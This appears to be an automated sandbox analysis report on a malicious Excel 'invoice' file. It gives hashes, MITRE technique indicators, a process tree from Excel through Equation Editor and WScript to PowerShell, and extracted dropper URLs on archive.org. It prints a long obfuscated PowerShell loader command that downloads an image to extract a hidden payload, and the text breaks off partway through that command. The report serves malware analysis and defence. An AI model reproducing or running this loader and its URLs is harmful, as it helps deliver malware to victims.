9270474814491efc7c0f4ef6f1200c68c1908ad27c31e5316370acf78e97fc09

Analysis

max time kernel
121s
max time network
125s
platform
windows7_x64
resource
win7-20240708-en
resource tags

arch:x64arch:x86image:win7-20240708-enlocale:en-usos:windows7-x64system
submitted
21/08/2024, 07:09

Sharing

Copy URL Twitter E-mail

Report Analysis Logs

General

Target

INV-PA00720082024002S.xla.xls
Size

481KB
MD5

08fb9822dc63acff13a2faec811cd744
SHA1

11a886d6ba2fbb73e55831763e26fbc5b695b4f6
SHA256

9270474814491efc7c0f4ef6f1200c68c1908ad27c31e5316370acf78e97fc09
SHA512

e8eef909bbda34c1dac3739234646402e8a3e5928565218237be9bff398b5c12cbf281c00f71f642ae3f7bd8e0e23fdda6bcc6c504c270187494a642f60759b7
SSDEEP

6144:QlTBpRTFwSgypddGx+kFdE+wt2zC2w/Y3CMw4jrE9v7ly1xmBqhfQmkAEdvWSsD2:YXG9sBMC2unTU6welZsDNSlwbeVWg

Score

10^/10

discovery execution

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://ia803104.us.archive.org/27/items/vbs_20240726_20240726/vbs.jpg

exe.dropper

https://ia803104.us.archive.org/27/items/vbs_20240726_20240726/vbs.jpg

Signatures

Blocklisted process makes network request 3 IoCs

flow	pid	Process
15	2288	EQNEDT32.EXE
17	1288	powershell.exe
18	1288	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
592	powershell.exe
1288	powershell.exe

Abuses OpenXML format to download file from external location 2 IoCs

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	EXCEL.EXE
Key opened	\REGISTRY\USER\S-1-5-21-2958949473-3205530200-1453100116-1000\Software\Microsoft\Office\Common\Offline\Files\https://jamp.to/9L7Wgu	WINWORD.EXE

Drops file in System32 directory 2 IoCs

description	ioc	Process
File opened for modification	C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 6 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	EXCEL.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WINWORD.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	EQNEDT32.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe

Office loads VBA resources, possible macro or embedded object present

Enumerates system info in registry 2 TTPs 1 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor	EXCEL.EXE

Launches Equation Editor 1 TTPs 1 IoCs

Equation Editor is an old Office component often targeted by exploits such as CVE-2017-11882.

exploit

Exploitation for Client Execution

T1203

pid	Process
2288	EQNEDT32.EXE

Suspicious behavior: AddClipboardFormatListener 1 IoCs

pid	Process
2148	EXCEL.EXE

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
592	powershell.exe
1288	powershell.exe

Suspicious use of AdjustPrivilegeToken 3 IoCs

description	pid	Process
Token: SeDebugPrivilege	592	powershell.exe
Token: SeDebugPrivilege	1288	powershell.exe
Token: SeShutdownPrivilege	2752	WINWORD.EXE

Suspicious use of SetWindowsHookEx 5 IoCs

pid	Process
2148	EXCEL.EXE
2148	EXCEL.EXE
2148	EXCEL.EXE
2752	WINWORD.EXE
2752	WINWORD.EXE

Suspicious use of WriteProcessMemory 16 IoCs

description	pid	Process	procid_target
PID 2288 wrote to memory of 2528	2288	EQNEDT32.EXE	35
PID 2288 wrote to memory of 2528	2288	EQNEDT32.EXE	35
PID 2288 wrote to memory of 2528	2288	EQNEDT32.EXE	35
PID 2288 wrote to memory of 2528	2288	EQNEDT32.EXE	35
PID 2528 wrote to memory of 592	2528	WScript.exe	36
PID 2528 wrote to memory of 592	2528	WScript.exe	36
PID 2528 wrote to memory of 592	2528	WScript.exe	36
PID 2528 wrote to memory of 592	2528	WScript.exe	36
PID 2752 wrote to memory of 2400	2752	WINWORD.EXE	38
PID 2752 wrote to memory of 2400	2752	WINWORD.EXE	38
PID 2752 wrote to memory of 2400	2752	WINWORD.EXE	38
PID 2752 wrote to memory of 2400	2752	WINWORD.EXE	38
PID 592 wrote to memory of 1288	592	powershell.exe	39
PID 592 wrote to memory of 1288	592	powershell.exe	39
PID 592 wrote to memory of 1288	592	powershell.exe	39
PID 592 wrote to memory of 1288	592	powershell.exe	39

C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\INV-PA00720082024002S.xla.xls
1⤵
- Abuses OpenXML format to download file from external location
- System Location Discovery: System Language Discovery
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:2148

C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" -Embedding
1⤵
- Abuses OpenXML format to download file from external location
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2752
- C:\Windows\splwow64.exe
  C:\Windows\splwow64.exe 12288
  2⤵
  PID:2400

C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
"C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
1⤵
- Blocklisted process makes network request
- System Location Discovery: System Language Discovery
- Launches Equation Editor
- Suspicious use of WriteProcessMemory
PID:2288
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\coupecakebutterbuncakecreamy.vBS"
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:2528
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J㍋ ∴ ♣ ▶ ⭣Bp㍋ ∴ ♣ ▶ ⭣G0㍋ ∴ ♣ ▶ ⭣YQBn㍋ ∴ ♣ ▶ ⭣GU㍋ ∴ ♣ ▶ ⭣VQBy㍋ ∴ ♣ ▶ ⭣Gw㍋ ∴ ♣ ▶ ⭣I㍋ ∴ ♣ ▶ ⭣㍋ ∴ ♣ ▶ ⭣9㍋ ∴ ♣ ▶ ⭣C㍋ ∴ ♣ ▶ ⭣㍋ ∴ ♣ ▶ ⭣JwBo㍋ ∴ ♣ ▶ ⭣HQ㍋ ∴ ♣ ▶ ⭣d㍋ ∴ ♣ ▶ ⭣Bw㍋ ∴ ♣ ▶ ⭣HM㍋ ∴ ♣ ▶ ⭣Og㍋ ∴ ♣ ▶ ⭣v㍋ ∴ ♣ ▶ ⭣C8㍋ ∴ ♣ ▶ ⭣aQBh㍋ ∴ ♣ ▶ ⭣Dg㍋ ∴ ♣ ▶ ⭣M㍋ ∴ ♣ ▶ ⭣㍋ ∴ ♣ ▶ ⭣z㍋ ∴ ♣ ▶ ⭣DE㍋ ∴ ♣ ▶ ⭣M㍋ ∴ ♣ ▶ ⭣㍋ ∴ ♣ ▶ ⭣0㍋ ∴ ♣ ▶ ⭣C4㍋ ∴ ♣ ▶ ⭣dQBz㍋ ∴ ♣ ▶ ⭣C4㍋ ∴ ♣ ▶ ⭣YQBy㍋ ∴ ♣ ▶ ⭣GM㍋ ∴ ♣ ▶ ⭣a㍋ ∴ ♣ ▶ ⭣Bp㍋ ∴ ♣ ▶ ⭣HY㍋ ∴ ♣ ▶ ⭣ZQ㍋ ∴ ♣ ▶ ⭣u㍋ ∴ ♣ ▶ ⭣G8㍋ ∴ ♣ ▶ ⭣cgBn㍋ ∴ ♣ ▶ ⭣C8㍋ ∴ ♣ ▶ ⭣Mg㍋ ∴ ♣ ▶ ⭣3㍋ ∴ ♣ ▶ ⭣C8㍋ ∴ ♣ ▶ ⭣aQB0㍋ ∴ ♣ ▶ ⭣GU㍋ ∴ ♣ ▶ ⭣bQBz㍋ ∴ ♣ ▶ ⭣C8㍋ ∴ ♣ ▶ ⭣dgBi㍋ ∴ ♣ ▶ ⭣HM㍋ ∴ ♣ ▶ ⭣Xw㍋ ∴ ♣ ▶ ⭣y㍋ ∴ ♣ ▶ ⭣D㍋ ∴ ♣ ▶ ⭣㍋ ∴ ♣ ▶ ⭣Mg㍋ ∴ ♣ ▶ ⭣0㍋ ∴ ♣ ▶ ⭣D㍋ ∴ ♣ ▶ ⭣㍋ ∴ ♣ ▶ ⭣Nw㍋ ∴ ♣ ▶ ⭣y㍋ ∴ ♣ ▶ ⭣DY㍋ ∴ ♣ ▶ ⭣Xw㍋ ∴ ♣ ▶ ⭣y㍋ ∴ ♣ ▶ ⭣D㍋ ∴ ♣ ▶ ⭣㍋ ∴ ♣ ▶ ⭣Mg㍋ ∴ ♣ ▶ ⭣0㍋ ∴ ♣ ▶ ⭣D㍋ ∴ ♣ ▶ ⭣㍋ ∴ ♣ ▶ ⭣Nw㍋ ∴ ♣ ▶ ⭣y㍋ ∴ ♣ ▶ ⭣DY㍋ ∴ ♣ ▶ ⭣LwB2㍋ ∴ ♣ ▶ ⭣GI㍋ ∴ ♣ ▶ ⭣cw㍋ ∴ ♣ ▶ ⭣u㍋ ∴ ♣ ▶ ⭣Go㍋ ∴ ♣ ▶ ⭣c㍋ ∴ ♣ ▶ ⭣Bn㍋ ∴ ♣ ▶ ⭣Cc㍋ ∴ ♣ ▶ ⭣Ow㍋ ∴ ♣ ▶ ⭣k㍋ ∴ ♣ ▶ ⭣Hc㍋ ∴ ♣ ▶ ⭣ZQBi㍋ ∴ ♣ ▶ ⭣EM㍋ ∴ ♣ ▶ ⭣b㍋ ∴ ♣ ▶ ⭣Bp㍋ ∴ ♣ ▶ ⭣GU㍋ ∴ ♣ ▶ ⭣bgB0㍋ ∴ ♣ ▶ ⭣C㍋ ∴ ♣ ▶ ⭣㍋ ∴ ♣ ▶ ⭣PQ㍋ ∴ ♣ ▶ ⭣g㍋ ∴ ♣ ▶ ⭣E4㍋ ∴ ♣ ▶ ⭣ZQB3㍋ ∴ ♣ ▶ ⭣C0㍋ ∴ ♣ ▶ ⭣TwBi㍋ ∴ ♣ ▶ ⭣Go㍋ ∴ ♣ ▶ ⭣ZQBj㍋ ∴ ♣ ▶ ⭣HQ㍋ ∴ ♣ ▶ ⭣I㍋ ∴ ♣ ▶ ⭣BT㍋ ∴ ♣ ▶ ⭣Hk㍋ ∴ ♣ ▶ ⭣cwB0㍋ ∴ ♣ ▶ ⭣GU㍋ ∴ ♣ ▶ ⭣bQ㍋ ∴ ♣ ▶ ⭣u㍋ ∴ ♣ ▶ ⭣E4㍋ ∴ ♣ ▶ ⭣ZQB0㍋ ∴ ♣ ▶ ⭣C4㍋ ∴ ♣ ▶ ⭣VwBl㍋ ∴ ♣ ▶ ⭣GI㍋ ∴ ♣ ▶ ⭣QwBs㍋ ∴ ♣ ▶ ⭣Gk㍋ ∴ ♣ ▶ ⭣ZQBu㍋ ∴ ♣ ▶ ⭣HQ㍋ ∴ ♣ ▶ ⭣Ow㍋ ∴ ♣ ▶ ⭣k㍋ ∴ ♣ ▶ ⭣Gk㍋ ∴ ♣ ▶ ⭣bQBh㍋ ∴ ♣ ▶ ⭣Gc㍋ ∴ ♣ ▶ ⭣ZQBC㍋ ∴ ♣ ▶ ⭣Hk㍋ ∴ ♣ ▶ ⭣d㍋ ∴ ♣ ▶ ⭣Bl㍋ ∴ ♣ ▶ ⭣HM㍋ ∴ ♣ ▶ ⭣I㍋ ∴ ♣ ▶ ⭣㍋ ∴ ♣ ▶ ⭣9㍋ ∴ ♣ ▶ ⭣C㍋ ∴ ♣ ▶ ⭣㍋ ∴ ♣ ▶ ⭣J㍋ ∴ ♣ ▶ ⭣B3㍋ ∴ ♣ ▶ ⭣GU㍋ ∴ ♣ ▶ ⭣YgBD㍋ ∴ ♣ ▶ ⭣Gw㍋ ∴ ♣ ▶ ⭣aQBl㍋ ∴ ♣ ▶ ⭣G4㍋ ∴ ♣ ▶ ⭣d㍋ ∴ ♣ ▶ ⭣㍋ ∴ ♣ ▶ ⭣u㍋ ∴ ♣ ▶ ⭣EQ㍋ ∴ ♣ ▶ ⭣bwB3㍋ ∴ ♣ ▶ ⭣G4㍋ ∴ ♣ ▶ ⭣b㍋ ∴ ♣ ▶ ⭣Bv㍋ ∴ ♣ ▶ ⭣GE㍋ ∴ ♣ ▶ ⭣Z㍋ ∴ ♣ ▶ ⭣BE㍋ ∴ ♣ ▶ ⭣GE㍋ ∴ ♣ ▶ ⭣d㍋ ∴ ♣ ▶ ⭣Bh㍋ ∴ ♣ ▶ ⭣Cg㍋ ∴ ♣ ▶ ⭣J㍋ ∴ ♣ ▶ ⭣Bp㍋ ∴ ♣ ▶ ⭣G0㍋ ∴ ♣ ▶ ⭣YQBn㍋ ∴ ♣ ▶ ⭣GU㍋ ∴ ♣ ▶ ⭣VQBy㍋ ∴ ♣ ▶ ⭣Gw㍋ ∴ ♣ ▶ ⭣KQ㍋ ∴ ♣ ▶ ⭣7㍋ ∴ ♣ ▶ ⭣CQ㍋ ∴ ♣ ▶ ⭣aQBt㍋ ∴ ♣ ▶ ⭣GE㍋ ∴ ♣ ▶ ⭣ZwBl㍋ ∴ ♣ ▶ ⭣FQ㍋ ∴ ♣ ▶ ⭣ZQB4㍋ ∴ ♣ ▶ ⭣HQ㍋ ∴ ♣ ▶ ⭣I㍋ ∴ ♣ ▶ ⭣㍋ ∴ ♣ ▶ ⭣9㍋ ∴ ♣ ▶ ⭣C㍋ ∴ ♣ ▶ ⭣㍋ ∴ ♣ ▶ ⭣WwBT㍋ ∴ ♣ ▶ ⭣Hk㍋ ∴ ♣ ▶ ⭣cwB0㍋ ∴ ♣ ▶ ⭣GU㍋ ∴ ♣ ▶ ⭣bQ㍋ ∴ ♣ ▶ ⭣u㍋ ∴ ♣ ▶ ⭣FQ㍋ ∴ ♣ ▶ ⭣ZQB4㍋ ∴ ♣ ▶ ⭣HQ㍋ ∴ ♣ ▶ ⭣LgBF㍋ ∴ ♣ ▶ ⭣G4㍋ ∴ ♣ ▶ ⭣YwBv㍋ ∴ ♣ ▶ ⭣GQ㍋ ∴ ♣ ▶ ⭣aQBu㍋ ∴ ♣ ▶ ⭣Gc㍋ ∴ ♣ ▶ ⭣XQ㍋ ∴ ♣ ▶ ⭣6㍋ ∴ ♣ ▶ ⭣Do㍋ ∴ ♣ ▶ ⭣VQBU㍋ ∴ ♣ ▶ ⭣EY㍋ ∴ ♣ ▶ ⭣O㍋ ∴ ♣ ▶ ⭣㍋ ∴ ♣ ▶ ⭣u㍋ ∴ ♣ ▶ ⭣Ec㍋ ∴ ♣ ▶ ⭣ZQB0㍋ ∴ ♣ ▶ ⭣FM㍋ ∴ ♣ ▶ ⭣d㍋ ∴ ♣ ▶ ⭣By㍋ ∴ ♣ ▶ ⭣Gk㍋ ∴ ♣ ▶ ⭣bgBn㍋ ∴ ♣ ▶ ⭣Cg㍋ ∴ ♣ ▶ ⭣J㍋ ∴ ♣ ▶ ⭣Bp㍋ ∴ ♣ ▶ ⭣G0㍋ ∴ ♣ ▶ ⭣YQBn㍋ ∴ ♣ ▶ ⭣GU㍋ ∴ ♣ ▶ ⭣QgB5㍋ ∴ ♣ ▶ ⭣HQ㍋ ∴ ♣ ▶ ⭣ZQBz㍋ ∴ ♣ ▶ ⭣Ck㍋ ∴ ♣ ▶ ⭣Ow㍋ ∴ ♣ ▶ ⭣k㍋ ∴ ♣ ▶ ⭣HM㍋ ∴ ♣ ▶ ⭣d㍋ ∴ ♣ ▶ ⭣Bh㍋ ∴ ♣ ▶ ⭣HI㍋ ∴ ♣ ▶ ⭣d㍋ ∴ ♣ ▶ ⭣BG㍋ ∴ ♣ ▶ ⭣Gw㍋ ∴ ♣ ▶ ⭣YQBn㍋ ∴ ♣ ▶ ⭣C㍋ ∴ ♣ ▶ ⭣㍋ ∴ ♣ ▶ ⭣PQ㍋ ∴ ♣ ▶ ⭣g㍋ ∴ ♣ ▶ ⭣Cc㍋ ∴ ♣ ▶ ⭣P㍋ ∴ ♣ ▶ ⭣㍋ ∴ ♣ ▶ ⭣8㍋ ∴ ♣ ▶ ⭣EI㍋ ∴ ♣ ▶ ⭣QQBT㍋ ∴ ♣ ▶ ⭣EU㍋ ∴ ♣ ▶ ⭣Ng㍋ ∴ ♣ ▶ ⭣0㍋ ∴ ♣ ▶ ⭣F8㍋ ∴ ♣ ▶ ⭣UwBU㍋ ∴ ♣ ▶ ⭣EE㍋ ∴ ♣ ▶ ⭣UgBU㍋ ∴ ♣ ▶ ⭣D4㍋ ∴ ♣ ▶ ⭣Pg㍋ ∴ ♣ ▶ ⭣n㍋ ∴ ♣ ▶ ⭣Ds㍋ ∴ ♣ ▶ ⭣J㍋ ∴ ♣ ▶ ⭣Bl㍋ ∴ ♣ ▶ ⭣G4㍋ ∴ ♣ ▶ ⭣Z㍋ ∴ ♣ ▶ ⭣BG㍋ ∴ ♣ ▶ ⭣Gw㍋ ∴ ♣ ▶ ⭣YQBn㍋ ∴ ♣ ▶ ⭣C㍋ ∴ ♣ ▶ ⭣㍋ ∴ ♣ ▶ ⭣PQ㍋ ∴ ♣ ▶ ⭣g㍋ ∴ ♣ ▶ ⭣Cc㍋ ∴ ♣ ▶ ⭣P㍋ ∴ ♣ ▶ ⭣㍋ ∴ ♣ ▶ ⭣8㍋ ∴ ♣ ▶ ⭣EI㍋ ∴ ♣ ▶ ⭣QQBT㍋ ∴ ♣ ▶ ⭣EU㍋ ∴ ♣ ▶ ⭣Ng㍋ ∴ ♣ ▶ ⭣0㍋ ∴ ♣ ▶ ⭣F8㍋ ∴ ♣ ▶ ⭣RQBO㍋ ∴ ♣ ▶ ⭣EQ㍋ ∴ ♣ ▶ ⭣Pg㍋ ∴ ♣ ▶ ⭣+㍋ ∴ ♣ ▶ ⭣Cc㍋ ∴ ♣ ▶ ⭣Ow㍋ ∴ ♣ ▶ ⭣k㍋ ∴ ♣ ▶ ⭣HM㍋ ∴ ♣ ▶ ⭣d㍋ ∴ ♣ ▶ ⭣Bh㍋ ∴ ♣ ▶ ⭣HI㍋ ∴ ♣ ▶ ⭣d㍋ ∴ ♣ ▶ ⭣BJ㍋ ∴ ♣ ▶ ⭣G4㍋ ∴ ♣ ▶ ⭣Z㍋ ∴ ♣ ▶ ⭣Bl㍋ ∴ ♣ ▶ ⭣Hg㍋ ∴ ♣ ▶ ⭣I㍋ ∴ ♣ ▶ ⭣㍋ ∴ ♣ ▶ ⭣9㍋ ∴ ♣ ▶ ⭣C㍋ ∴ ♣ ▶ ⭣㍋ ∴ ♣ ▶ ⭣J㍋ ∴ ♣ ▶ ⭣Bp㍋ ∴ ♣ ▶ ⭣G0㍋ ∴ ♣ ▶ ⭣YQBn㍋ ∴ ♣ ▶ ⭣GU㍋ ∴ ♣ ▶ ⭣V㍋ ∴ ♣ ▶ ⭣Bl㍋ ∴ ♣ ▶ ⭣Hg㍋ ∴ ♣ ▶ ⭣d㍋ ∴ ♣ ▶ ⭣㍋ ∴ ♣ ▶ ⭣u㍋ ∴ ♣ ▶ ⭣Ek㍋ ∴ ♣ ▶ ⭣bgBk㍋ ∴ ♣ ▶ ⭣GU㍋ ∴ ♣ ▶ ⭣e㍋ ∴ ♣ ▶ ⭣BP㍋ ∴ ♣ ▶ ⭣GY㍋ ∴ ♣ ▶ ⭣K㍋ ∴ ♣ ▶ ⭣㍋ ∴ ♣ ▶ ⭣k㍋ ∴ ♣ ▶ ⭣HM㍋ ∴ ♣ ▶ ⭣d㍋ ∴ ♣ ▶ ⭣Bh㍋ ∴ ♣ ▶ ⭣HI㍋ ∴ ♣ ▶ ⭣d㍋ ∴ ♣ ▶ ⭣BG㍋ ∴ ♣ ▶ ⭣Gw㍋ ∴ ♣ ▶ ⭣YQBn㍋ ∴ ♣ ▶ ⭣Ck㍋ ∴ ♣ ▶ ⭣Ow㍋ ∴ ♣ ▶ ⭣k㍋ ∴ ♣ ▶ ⭣GU㍋ ∴ ♣ ▶ ⭣bgBk㍋ ∴ ♣ ▶ ⭣Ek㍋ ∴ ♣ ▶ ⭣bgBk㍋ ∴ ♣ ▶ ⭣GU㍋ ∴ ♣ ▶ ⭣e㍋ ∴ ♣ ▶ ⭣㍋ ∴ ♣ ▶ ⭣g㍋ ∴ ♣ ▶ ⭣D0㍋ ∴ ♣ ▶ ⭣I㍋ ∴ ♣ ▶ ⭣㍋ ∴ ♣ ▶ ⭣k㍋ ∴ ♣ ▶ ⭣Gk㍋ ∴ ♣ ▶ ⭣bQBh㍋ ∴ ♣ ▶ ⭣Gc㍋ ∴ ♣ ▶ ⭣ZQBU㍋ ∴ ♣ ▶ ⭣GU㍋ ∴ ♣ ▶ ⭣e㍋ ∴ ♣ ▶ ⭣B0㍋ ∴ ♣ ▶ ⭣C4㍋ ∴ ♣ ▶ ⭣SQBu㍋ ∴ ♣ ▶ ⭣GQ㍋ ∴ ♣ ▶ ⭣ZQB4㍋ ∴ ♣ ▶ ⭣E8㍋ ∴ ♣ ▶ ⭣Zg㍋ ∴ ♣ ▶ ⭣o㍋ ∴ ♣ ▶ ⭣CQ㍋ ∴ ♣ ▶ ⭣ZQBu㍋ ∴ ♣ ▶ ⭣GQ㍋ ∴ ♣ ▶ ⭣RgBs㍋ ∴ ♣ ▶ ⭣GE㍋ ∴ ♣ ▶ ⭣Zw㍋ ∴ ♣ ▶ ⭣p㍋ ∴ ♣ ▶ ⭣Ds㍋ ∴ ♣ ▶ ⭣J㍋ ∴ ♣ ▶ ⭣Bz㍋ ∴ ♣ ▶ ⭣HQ㍋ ∴ ♣ ▶ ⭣YQBy㍋ ∴ ♣ ▶ ⭣HQ㍋ ∴ ♣ ▶ ⭣SQBu㍋ ∴ ♣ ▶ ⭣GQ㍋ ∴ ♣ ▶ ⭣ZQB4㍋ ∴ ♣ ▶ ⭣C㍋ ∴ ♣ ▶ ⭣㍋ ∴ ♣ ▶ ⭣LQBn㍋ ∴ ♣ ▶ ⭣GU㍋ ∴ ♣ ▶ ⭣I㍋ ∴ ♣ ▶ ⭣㍋ ∴ ♣ ▶ ⭣w㍋ ∴ ♣ ▶ ⭣C㍋ ∴ ♣ ▶ ⭣㍋ ∴ ♣ ▶ ⭣LQBh㍋ ∴ ♣ ▶ ⭣G4㍋ ∴ ♣ ▶ ⭣Z㍋ ∴ ♣ ▶ ⭣㍋ ∴ ♣ ▶ ⭣g㍋ ∴ ♣ ▶ ⭣CQ㍋ ∴ ♣ ▶ ⭣ZQBu㍋ ∴ ♣ ▶ ⭣GQ㍋ ∴ ♣ ▶ ⭣SQBu㍋ ∴ ♣ ▶ ⭣GQ㍋ ∴ ♣ ▶ ⭣ZQB4㍋ ∴ ♣ ▶ ⭣C㍋ ∴ ♣ ▶ ⭣㍋ ∴ ♣ ▶ ⭣LQBn㍋ ∴ ♣ ▶ ⭣HQ㍋ ∴ ♣ ▶ ⭣I㍋ ∴ ♣ ▶ ⭣㍋ ∴ ♣ ▶ ⭣k㍋ ∴ ♣ ▶ ⭣HM㍋ ∴ ♣ ▶ ⭣d㍋ ∴ ♣ ▶ ⭣Bh㍋ ∴ ♣ ▶ ⭣HI㍋ ∴ ♣ ▶ ⭣d㍋ ∴ ♣ ▶ ⭣BJ㍋ ∴ ♣ ▶ ⭣G4㍋ ∴ ♣ ▶ ⭣Z㍋ ∴ ♣ ▶ ⭣Bl㍋ ∴ ♣ ▶ ⭣Hg㍋ ∴ ♣ ▶ ⭣Ow㍋ ∴ ♣ ▶ ⭣k㍋ ∴ ♣ ▶ ⭣HM㍋ ∴ ♣ ▶ ⭣d㍋ ∴ ♣ ▶ ⭣Bh㍋ ∴ ♣ ▶ ⭣HI㍋ ∴ ♣ ▶ ⭣d㍋ ∴ ♣ ▶ ⭣BJ㍋ ∴ ♣ ▶ ⭣G4㍋ ∴ ♣ ▶ ⭣Z㍋ ∴ ♣ ▶ ⭣Bl㍋ ∴ ♣ ▶ ⭣Hg㍋ ∴ ♣ ▶ ⭣I㍋ ∴ ♣ ▶ ⭣㍋ ∴ ♣ ▶ ⭣r㍋ ∴ ♣ ▶ ⭣D0㍋ ∴ ♣ ▶ ⭣I㍋ ∴ ♣ ▶ ⭣㍋ ∴ ♣ ▶ ⭣k㍋ ∴ ♣ ▶ ⭣HM㍋ ∴ ♣ ▶ ⭣d㍋ ∴ ♣ ▶ ⭣Bh㍋ ∴ ♣ ▶ ⭣HI㍋ ∴ ♣ ▶ ⭣d㍋ ∴ ♣ ▶ ⭣BG㍋ ∴ ♣ ▶ ⭣Gw㍋ ∴ ♣ ▶ ⭣YQBn㍋ ∴ ♣ ▶ ⭣C4㍋ ∴ ♣ ▶ ⭣T㍋ ∴ ♣ ▶ ⭣Bl㍋ ∴ ♣ ▶ ⭣G4㍋ ∴ ♣ ▶ ⭣ZwB0㍋ ∴ ♣ ▶ ⭣Gg㍋ ∴ ♣ ▶ ⭣Ow㍋ ∴ ♣ ▶ ⭣k㍋ ∴ ♣ ▶ ⭣GI㍋ ∴ ♣ ▶ ⭣YQBz㍋ ∴ ♣ ▶ ⭣GU㍋ ∴ ♣ ▶ ⭣Ng㍋ ∴ ♣ ▶ ⭣0㍋ ∴ ♣ ▶ ⭣Ew㍋ ∴ ♣ ▶ ⭣ZQBu㍋ ∴ ♣ ▶ ⭣Gc㍋ ∴ ♣ ▶ ⭣d㍋ ∴ ♣ ▶ ⭣Bo㍋ ∴ ♣ ▶ ⭣C㍋ ∴ ♣ ▶ ⭣㍋ ∴ ♣ ▶ ⭣PQ㍋ ∴ ♣ ▶ ⭣g㍋ ∴ ♣ ▶ ⭣CQ㍋ ∴ ♣ ▶ ⭣ZQBu㍋ ∴ ♣ ▶ ⭣GQ㍋ ∴ ♣ ▶ ⭣SQBu㍋ ∴ ♣ ▶ ⭣GQ㍋ ∴ ♣ ▶ ⭣ZQB4㍋ ∴ ♣ ▶ ⭣C㍋ ∴ ♣ ▶ ⭣㍋ ∴ ♣ ▶ ⭣LQ㍋ ∴ ♣ ▶ ⭣g㍋ ∴ ♣ ▶ ⭣CQ㍋ ∴ ♣ ▶ ⭣cwB0㍋ ∴ ♣ ▶ ⭣GE㍋ ∴ ♣ ▶ ⭣cgB0㍋ ∴ ♣ ▶ ⭣Ek㍋ ∴ ♣ ▶ ⭣bgBk㍋ ∴ ♣ ▶ ⭣GU㍋ ∴ ♣ ▶ ⭣e㍋ ∴ ♣ ▶ ⭣㍋ ∴ ♣ ▶ ⭣7㍋ ∴ ♣ ▶ ⭣CQ㍋ ∴ ♣ ▶ ⭣YgBh㍋ ∴ ♣ ▶ ⭣HM㍋ ∴ ♣ ▶ ⭣ZQ㍋ ∴ ♣ ▶ ⭣2㍋ ∴ ♣ ▶ ⭣DQ㍋ ∴ ♣ ▶ ⭣QwBv㍋ ∴ ♣ ▶ ⭣G0㍋ ∴ ♣ ▶ ⭣bQBh㍋ ∴ ♣ ▶ ⭣G4㍋ ∴ ♣ ▶ ⭣Z㍋ ∴ ♣ ▶ ⭣㍋ ∴ ♣ ▶ ⭣g㍋ ∴ ♣ ▶ ⭣D0㍋ ∴ ♣ ▶ ⭣I㍋ ∴ ♣ ▶ ⭣㍋ ∴ ♣ ▶ ⭣k㍋ ∴ ♣ ▶ ⭣Gk㍋ ∴ ♣ ▶ ⭣bQBh㍋ ∴ ♣ ▶ ⭣Gc㍋ ∴ ♣ ▶ ⭣ZQBU㍋ ∴ ♣ ▶ ⭣GU㍋ ∴ ♣ ▶ ⭣e㍋ ∴ ♣ ▶ ⭣B0㍋ ∴ ♣ ▶ ⭣C4㍋ ∴ ♣ ▶ ⭣UwB1㍋ ∴ ♣ ▶ ⭣GI㍋ ∴ ♣ ▶ ⭣cwB0㍋ ∴ ♣ ▶ ⭣HI㍋ ∴ ♣ ▶ ⭣aQBu㍋ ∴ ♣ ▶ ⭣Gc㍋ ∴ ♣ ▶ ⭣K㍋ ∴ ♣ ▶ ⭣㍋ ∴ ♣ ▶ ⭣k㍋ ∴ ♣ ▶ ⭣HM㍋ ∴ ♣ ▶ ⭣d㍋ ∴ ♣ ▶ ⭣Bh㍋ ∴ ♣ ▶ ⭣HI㍋ ∴ ♣ ▶ ⭣d㍋ ∴ ♣ ▶ ⭣BJ㍋ ∴ ♣ ▶ ⭣G4㍋ ∴ ♣ ▶ ⭣Z㍋ ∴ ♣ ▶ ⭣Bl㍋ ∴ ♣ ▶ ⭣Hg㍋ ∴ ♣ ▶ ⭣L㍋ ∴ ♣ ▶ ⭣㍋ ∴ ♣ ▶ ⭣g㍋ ∴ ♣ ▶ ⭣CQ㍋ ∴ ♣ ▶ ⭣YgBh㍋ ∴ ♣ ▶ ⭣HM㍋ ∴ ♣ ▶ 